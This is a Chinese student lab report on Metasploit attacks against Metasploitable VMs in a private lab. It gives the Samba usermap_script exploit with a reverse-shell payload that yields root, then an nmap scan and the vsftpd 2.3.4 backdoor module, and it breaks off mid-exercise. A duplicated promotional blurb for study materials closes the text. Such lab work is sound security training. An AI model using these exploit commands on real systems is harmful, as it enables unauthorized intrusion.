(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
2.实践过程
2.1 使用Metasploit进行Linux远程渗透攻击
本次实践使用的攻击机和靶机如下表所示
虚拟机类别 | 虚拟机名称 | IP地址 |
---|---|---|
攻击机 | Kali | 192.168.200.3 |
靶机 | Metasploitable_ubuntu | 192.168.200.123 |
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
- 在Kali中输入
msfconsole
命令启动Metasploit
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块
- 先使用
search
命令搜索usermap_script
渗透攻击模块
- 根据搜索结果,输入
use exploit/multi/samba/usermap_script
命令使用该模块
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可)
- 先使用命令
show payloads
查看攻击载荷
- 使用命令
set payload cmd/unix/reverse
将远程Shell作为攻击载荷
④设置渗透攻击参数(RHOST,LHOST,TARGET等)
- 输入命令
show options
显示渗透攻击参数
- 输入
set LHOST 192.168.200.3
将LHOST
设置为攻击机Kali的IP - 输入
set RHOST 192.168.200.123
将RHOST
设置为靶机Metasploitable_ubuntu的IP
- 再次输入命令
show options
显示渗透攻击参数,查看参数是否设置成功
根据显示的参数可知,已设置成功
⑤执行渗透攻击
- 输入命令
exploit
实施攻击
⑥查看是否正确得到远程Shell,并查看获得的权限
- 输入命令
ifconfig
查看IP地址
可知此时的IP地址为192.168.200.123
,确定获得了靶机的Shell,攻击成功 - 再输入
whoami
命令,查看权限
显然,我们获得了root权限
2.2 实践作业:攻防对抗实践
①攻击实验
虚拟机分类 | 虚拟机名称 | IP |
---|---|---|
攻击机(吴锦龙20232803) | Kali | 172.20.10.4 |
靶机(张哲20232807) | Metasploitable_ubuntu | 172.20.10.5 |
- 在Kali中输入命令
sudo nmap -sV 172.20.10.5
使用namp
进行探测
我们可以看到21
号端口上运行的是vsftpd 2.3.4
版本的ftp
服务 - 输入
msfconsole
命令启动Metasploit
- 输入命令
search vsftpd
搜索是否有关于vsftpd
的模块
可以看到图中第二个模块即为vsftpd 2.3.4
版本相应的模块 - 输入命令
use exploit/unix/ftp/vsftpd_234_backdoor
来使用该模块
- 输入命令
show payloads
查看攻击载荷
- 设置攻击载荷
- 输入命令
show options
显示需要设置的参数
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!